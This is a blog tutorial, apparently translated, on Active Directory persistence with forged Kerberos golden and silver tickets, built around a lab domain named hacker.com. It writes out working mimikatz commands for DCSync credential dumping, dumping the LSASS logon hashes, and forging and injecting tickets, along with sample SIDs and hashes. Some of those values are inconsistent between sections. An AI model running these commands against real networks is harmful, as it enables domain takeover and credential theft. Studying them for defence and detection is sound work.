Post-exploitation: domain privilege persistence, using golden and silver tickets to obtain domain controller access

Disclaimer: the techniques described in this article are intended for network security professionals and white-hat use only. No individual or organization may use these techniques and tools in criminal activity; any such abuse that is discovered will be reported directly to the national security authorities.

Privilege persistence


Golden ticket

MS14-068 works by forging a TGT that carries domain admin group membership. A golden ticket also forges a TGT, but it does so with the key of the krbtgt account: the KDC encrypts and signs every TGT it issues with the krbtgt key, so whoever holds krbtgt's NTLM hash (or AES key) can mint a TGT for any domain user, including one that does not exist, with any group membership. The forged TGT stays valid until the krbtgt password has been changed twice, and mimikatz gives it a 10-year lifetime by default, which is itself something defenders look for.

Prerequisites for a golden ticket:
1. Domain name: hacker.com
2. Domain SID: S-1-5-21-1854149318-4101476522-1845767379
3. NTLM hash (or AES-256 key) of the domain's KRBTGT account: 0028977ae726d766b150520dc63df9b4
4. Username to impersonate: administrator

Extracting the NTLM hash of the krbtgt account with DCSync (needs replication rights, i.e. a domain admin or equivalent session):

lsadump::dcsync /domain:hacker.com /user:krbtgt

Forging a TGT for the administrator user and injecting it into the current session (/ptt):

kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt

(The SID and hash in this command differ from the values listed above; whatever values you use, /sid: must be the SID of the domain whose krbtgt hash you hold, or the ticket is useless.)

Silver ticket

A silver ticket works differently from MS14-068 and the golden ticket. Those two forge a TGT (ticket-granting ticket), whereas a silver ticket forges an ST (service ticket) for one specific service, encrypted with that service account's key. The forged ST is presented straight to the service; there is no TGS request, so the KDC never sees it and the domain controller records no 4769 event, which makes it stealthier (only the target host logs the resulting logon). The drawback is that it only works against the single service it was forged for, such as cifs (file sharing), MSSQLSvc (SQL Server), http (WinRM), dns or ldap. For a service running as SYSTEM on a host the key is that host's machine account, so a CIFS silver ticket for the DC needs the NTLM hash of DC$.

Prerequisites for a silver ticket:
1. Domain name: hacker.com
2. Domain SID: S-1-5-21-1854149318-4101476522-1845767379
3. FQDN of the target server: dc.hacker.com
4. Target service: CIFS
5. NTLM hash of the service account (here the DC's machine account, DC$): 52c74fc45feba971209be6f2bc068814
6. Username to impersonate: test

Dumping the domain controller's machine account hash (run on the DC; sekurlsa::logonpasswords lists the NTLM hash of DC$ under the msv block):

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt

Forging the silver ticket for CIFS on dc.hacker.com and injecting it (/ptt):

kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt


Lab environment:

  • Windows Server 2012 R2 x64 (domain controller)
  • Windows 7 x64 SP1 (domain member workstation)
  • pfSense (routing)
    MS14-068

For how to build the domain environment, see the author's 30,000-word detailed deployment tutorial on building an enterprise intranet with a domain controller.


Lab walkthrough:

Forging a golden ticket

Information gathering

1. ipconfig /all to get the domain name
2. whoami /all to get the SID (the domain SID is the user's SID with the trailing RID removed)
3. mimikatz to get the NTLM hash of the krbtgt user
4. klist purge to clear any existing tickets

Forging the ticket

Substitute the collected values into the mimikatz kerberos::golden command, forge the ticket for the administrator user, then exit mimikatz.
The domain controller can now be accessed.
After purging the ticket again with klist purge, access is denied, which confirms that the forged TGT was what granted it.

Forging a silver ticket

Information gathering

1. ipconfig /all to get the domain controller's IP address
2. ping -a 10.1.1.1 to resolve the DC's full domain name, dc.hacker.com
3. whoami /all to get the SID
4. Export the domain controller's machine account hash with mimikatz

Forging the ticket

Substitute the collected values into the mimikatz kerberos::golden command with /service:cifs; the forged service ticket then grants access to the domain controller's file share.



Source: blog.csdn.net/weixin_45728976/article/details/105290034